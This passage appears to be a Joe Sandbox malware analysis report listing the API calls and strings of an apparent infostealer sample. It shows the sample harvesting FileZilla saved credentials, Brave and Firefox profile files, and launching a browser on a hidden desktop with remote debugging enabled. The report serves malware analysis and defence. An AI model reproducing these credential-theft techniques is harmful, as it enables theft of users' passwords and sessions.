                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D74061
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7408A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D740CE
                            • lstrcat.KERNEL32(00000000), ref: 00D740DB
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D742D9
                            • FindClose.KERNEL32(00000000), ref: 00D742E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: 924aee22953c131cbeb255cd62bc7d9faaac25236dacb19fae9c3ce8746baae8
                            • Instruction ID: 91852bd2d6f9830c3458046e16a627b92008d64a1d1b6fc2eafa90396d392455
                            • Opcode Fuzzy Hash: 924aee22953c131cbeb255cd62bc7d9faaac25236dacb19fae9c3ce8746baae8
                            • Instruction Fuzzy Hash: 3262983191161A9BCB21EFB8DC49AAE77B9FF44300F098129F81997250EB74DE45DBB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76995
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00D769C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76A29
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D76A34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76A5D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00D76A77
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76A99
                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00D76AA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76B00
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00D76B35
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76B9D
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76BCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: cc49e33192dfcfa9d3eeefbda11c2d52750420f9b91805fa7117f2f14caed903
                            • Instruction ID: 2c68e6e22cc1afaf088bab20d5a581b61a38cece104ae655b882aca3872bab05
                            • Opcode Fuzzy Hash: cc49e33192dfcfa9d3eeefbda11c2d52750420f9b91805fa7117f2f14caed903
                            • Instruction Fuzzy Hash: AF42B230A15A1AAFDB21EBB4DC49A6E7BB9EF44700F089419F909E7251FB74D901CB70
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DBEF
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D6DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DC17
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D6DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DC4C
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DC8F
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D6DCD0
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D6DCF0
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D6DD0A
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D6DD1D
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DD7B
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DDA3
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DDAF
                            • lstrlen.KERNEL32(?), ref: 00D6DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 00D6DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DE19
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6DE6F
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DE7B
                            • lstrlen.KERNEL32(00BF8E60), ref: 00D6DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DEBB
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6DEE6
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DEF2
                            • lstrlen.KERNEL32(00BF8F20), ref: 00D6DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DFA5
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DFB1
                            • lstrlen.KERNEL32(00BF8E60), ref: 00D6DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DFF4
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E022
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6E02E
                            • lstrlen.KERNEL32(00BF8F20), ref: 00D6E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 00D6E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 00D6E0E7
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6E11F
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D6E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E155
                            • lstrcat.KERNEL32(00000000,?), ref: 00D6E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E19F
                            • lstrcat.KERNEL32(00000000), ref: 00D6E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00D6E1F9
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6E22F
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D6E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E261
                            • lstrcat.KERNEL32(00000000,00BF8F90), ref: 00D6E269
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D6E988
                            • FindClose.KERNEL32(00000000), ref: 00D6E997
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                            • String ID: Brave$Preferences$\Brave\Preferences
                            • API String ID: 1346089424-1230934161
                            • Opcode ID: 7ad9ad1b352f809fa03b422a9fedb161e1a10b24a7a01a594d7862f6b6ef44a9
                            • Instruction ID: af24ff777229a9151dcb87d1bea22105a1a0729781c176b9cbd3a4c0e1412523
                            • Opcode Fuzzy Hash: 7ad9ad1b352f809fa03b422a9fedb161e1a10b24a7a01a594d7862f6b6ef44a9
                            • Instruction Fuzzy Hash: C8527B70A1160A9FCB21EFB8DC89AAE77B9EF48300F094529F806D7251DB74DD458BB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D660FF
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D66152
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D66185
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D661B5
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D661F0
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D66223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D66233
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 497b2d3463f4371ce80dbd8994f8318ec4c0dd0b403a3abd37153179dab2a7b4
                            • Instruction ID: 2117dde4be69f0056af22d29cafb3540026f03e64815430e069e44f617fba93d
                            • Opcode Fuzzy Hash: 497b2d3463f4371ce80dbd8994f8318ec4c0dd0b403a3abd37153179dab2a7b4
                            • Instruction Fuzzy Hash: 98527B3191161A9BDB21EFB8DC49AAE77B9EF48300F194029F815E7251DB74ED02CBB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76B9D
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76BCD
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76BFD
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76C2F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00D76C3C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D76C43
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00D76C5A
                            • lstrlen.KERNEL32(00000000), ref: 00D76C65
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76CCF
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00D76CE2
                            • lstrlen.KERNEL32(00000000), ref: 00D76CED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76D30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76D57
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00D76D6A
                            • lstrlen.KERNEL32(00000000), ref: 00D76D75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76DB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76DDF
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00D76DF2
                            • lstrlen.KERNEL32(00000000), ref: 00D76E01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76E49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76E71
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00D76E94
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D76EA8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00D76EC9
                            • LocalFree.KERNEL32(00000000), ref: 00D76ED4
                            • lstrlen.KERNEL32(?), ref: 00D76F6E
                            • lstrlen.KERNEL32(?), ref: 00D76F81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: 8faf8c8d992678b6f009d6cd2a7c924ba1fe1c5a7204135382677ea932b3840c
                            • Instruction ID: 7a66a4c95af1da5cc0ce3ea2094af01ba3d9224091901e62395296010555bd5a
                            • Opcode Fuzzy Hash: 8faf8c8d992678b6f009d6cd2a7c924ba1fe1c5a7204135382677ea932b3840c
                            • Instruction Fuzzy Hash: 6302D230A55619AFDB21EBB4CC49E6E7BB9EF04704F089419F90AE7251FB74D9018B70
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D74B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D74B7F
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D74B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74BA7
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D74BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D74BFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: 9113e27b11bc0aaac34b209da4e3635d8c33f8c92b2bef18cac7216b36ec75f9
                            • Instruction ID: d424547a151819493ec40cfa2424f96f45b44f257ccf8a2f240875dfd963d585
                            • Opcode Fuzzy Hash: 9113e27b11bc0aaac34b209da4e3635d8c33f8c92b2bef18cac7216b36ec75f9
                            • Instruction Fuzzy Hash: 21923D70A016058FDB25CF29D948A69B7F5BF44314F1DC0AEE80D9B2A5E7B1DC82CB61
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D71291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D712B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D712BF
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D712CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D712E7
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D712F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D7133A
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7135C
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D71376
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D713AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D713D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D713E2
                            • lstrlen.KERNEL32(00D91794), ref: 00D713ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7140A
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71416
                            • lstrlen.KERNEL32(?), ref: 00D71423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71443
                            • lstrcat.KERNEL32(00000000,?), ref: 00D71451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7147A
                            • StrCmpCA.SHLWAPI(?,00BFCF90), ref: 00D714A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D714E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71535
                            • StrCmpCA.SHLWAPI(?,00BFDA00), ref: 00D71552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71593
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D715BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D715E4
                            • StrCmpCA.SHLWAPI(?,00BFCF30), ref: 00D71602
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71633
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7165C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71685
                            • StrCmpCA.SHLWAPI(?,00BFD008), ref: 00D716B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D716F4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7171D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71745
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D717BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D717F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D7181C
                            • FindClose.KERNEL32(00000000), ref: 00D7182B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 32e0f642b7fce03cfc04e896de69c76fae3e55e340c9f660098ee71d0d64a45c
                            • Instruction ID: b5f32ce9e3a51c22ff92aa0328d56a384fabea90f7f07bbe74ebb7b584135d59
                            • Opcode Fuzzy Hash: 32e0f642b7fce03cfc04e896de69c76fae3e55e340c9f660098ee71d0d64a45c
                            • Instruction Fuzzy Hash: 6312867561160A9BCB24EF7CD849AAE77B8EF44300F08862DF84AD7250EB74DD458BB0
                            APIs
                            • wsprintfA.USER32 ref: 00D7CBFC
                            • FindFirstFileA.KERNEL32(?,?), ref: 00D7CC13
                            • lstrcat.KERNEL32(?,?), ref: 00D7CC5F
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7CC71
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D7CC8B
                            • wsprintfA.USER32 ref: 00D7CCB0
                            • PathMatchSpecA.SHLWAPI(?,00BF8F60), ref: 00D7CCE2
                            • CoInitialize.OLE32(00000000), ref: 00D7CCEE
                              • Part of subcall function 00D7CAE0: CoCreateInstance.COMBASE(00D8B110,00000000,00000001,00D8B100,?), ref: 00D7CB06
                              • Part of subcall function 00D7CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00D7CB46
                              • Part of subcall function 00D7CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00D7CBC9
                            • CoUninitialize.COMBASE ref: 00D7CD09
                            • lstrcat.KERNEL32(?,?), ref: 00D7CD2E
                            • lstrlen.KERNEL32(?), ref: 00D7CD3B
                            • StrCmpCA.SHLWAPI(?,00D8CFEC), ref: 00D7CD55
                            • wsprintfA.USER32 ref: 00D7CD7D
                            • wsprintfA.USER32 ref: 00D7CD9C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 00D7CDB0
                            • wsprintfA.USER32 ref: 00D7CDD8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00D7CDF1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00D7CE10
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00D7CE28
                            • CloseHandle.KERNEL32(00000000), ref: 00D7CE33
                            • CloseHandle.KERNEL32(00000000), ref: 00D7CE3F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D7CE54
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7CE94
                            • FindNextFileA.KERNEL32(?,?), ref: 00D7CF8D
                            • FindClose.KERNEL32(?), ref: 00D7CF9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 83a91bc5ac624948f0e79eaa0469b9549e74f1077c30ee953f3da62f8556bb73
                            • Instruction ID: a915a94562ce12211064c828d3b7d79af4b9a3200f51593e42f3329179565463
                            • Opcode Fuzzy Hash: 83a91bc5ac624948f0e79eaa0469b9549e74f1077c30ee953f3da62f8556bb73
                            • Instruction Fuzzy Hash: FBC171719102199FDB20DF64DC49EEE7779EF88304F049599F909A7190EA70AA45CF70
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D71291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D712B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D712BF
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D712CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D712E7
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D712F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D7133A
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7135C
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D71376
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D713AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D713D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D713E2
                            • lstrlen.KERNEL32(00D91794), ref: 00D713ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7140A
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71416
                            • lstrlen.KERNEL32(?), ref: 00D71423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71443
                            • lstrcat.KERNEL32(00000000,?), ref: 00D71451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7147A
                            • StrCmpCA.SHLWAPI(?,00BFCF90), ref: 00D714A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D714E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71535
                            • StrCmpCA.SHLWAPI(?,00BFDA00), ref: 00D71552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71593
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D715BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D715E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D717BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D717F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D7181C
                            • FindClose.KERNEL32(00000000), ref: 00D7182B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: dc9d1676466e2f3176be46920d8bb14a5e55bbd139126e301a824a58adc41fcf
                            • Instruction ID: e662dac007551e7b264ed9c00e23629becc58d3a327aff3c89edd2be6c5a2cea
                            • Opcode Fuzzy Hash: dc9d1676466e2f3176be46920d8bb14a5e55bbd139126e301a824a58adc41fcf
                            • Instruction Fuzzy Hash: 3CC16335A1160A9BCB21EF78DC89AAE77B8EF44304F084529F84AD7251EB74DD458BB0
                            APIs
                            • memset.MSVCRT ref: 00D69790
                            • lstrcat.KERNEL32(?,?), ref: 00D697A0
                            • lstrcat.KERNEL32(?,?), ref: 00D697B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00D697C3
                            • memset.MSVCRT ref: 00D697D7
                              • Part of subcall function 00D83E70: lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D83EA5
                              • Part of subcall function 00D83E70: lstrcpy.KERNEL32(00000000,00BFA558), ref: 00D83ECF
                              • Part of subcall function 00D83E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00D6134E,?,0000001A), ref: 00D83ED9
                            • wsprintfA.USER32 ref: 00D69806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00D69827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00D69844
                              • Part of subcall function 00D846A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00D846B9
                              • Part of subcall function 00D846A0: Process32First.KERNEL32(00000000,00000128), ref: 00D846C9
                              • Part of subcall function 00D846A0: Process32Next.KERNEL32(00000000,00000128), ref: 00D846DB
                              • Part of subcall function 00D846A0: StrCmpCA.SHLWAPI(?,?), ref: 00D846ED
                              • Part of subcall function 00D846A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D84702
                              • Part of subcall function 00D846A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00D84711
                              • Part of subcall function 00D846A0: CloseHandle.KERNEL32(00000000), ref: 00D84718
                              • Part of subcall function 00D846A0: Process32Next.KERNEL32(00000000,00000128), ref: 00D84726
                              • Part of subcall function 00D846A0: CloseHandle.KERNEL32(00000000), ref: 00D84731
                            • lstrcat.KERNEL32(00000000,?), ref: 00D69878
                            • lstrcat.KERNEL32(00000000,?), ref: 00D69889
                            • lstrcat.KERNEL32(00000000,00D94B60), ref: 00D6989B
                            • memset.MSVCRT ref: 00D698AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00D698D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D69903
                            • StrStrA.SHLWAPI(00000000,00BFDEF8), ref: 00D69919
                            • lstrcpyn.KERNEL32(00F993D0,00000000,00000000), ref: 00D69938
                            • lstrlen.KERNEL32(?), ref: 00D6994B
                            • wsprintfA.USER32 ref: 00D6995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 00D69971
                            • Sleep.KERNEL32(00001388), ref: 00D699E7
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                              • Part of subcall function 00D692B0: strlen.MSVCRT ref: 00D692E1
                              • Part of subcall function 00D692B0: strlen.MSVCRT ref: 00D692FA
                              • Part of subcall function 00D692B0: strlen.MSVCRT ref: 00D69399
                              • Part of subcall function 00D692B0: strlen.MSVCRT ref: 00D693E6
                              • Part of subcall function 00D84740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00D84759
                              • Part of subcall function 00D84740: Process32First.KERNEL32(00000000,00000128), ref: 00D84769
                              • Part of subcall function 00D84740: Process32Next.KERNEL32(00000000,00000128), ref: 00D8477B
                              • Part of subcall function 00D84740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D8479C
                              • Part of subcall function 00D84740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00D847AB
                              • Part of subcall function 00D84740: CloseHandle.KERNEL32(00000000), ref: 00D847B2
                              • Part of subcall function 00D84740: Process32Next.KERNEL32(00000000,00000128), ref: 00D847C0
                              • Part of subcall function 00D84740: CloseHandle.KERNEL32(00000000), ref: 00D847CB
                            • CloseDesktop.USER32(?), ref: 00D69A1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
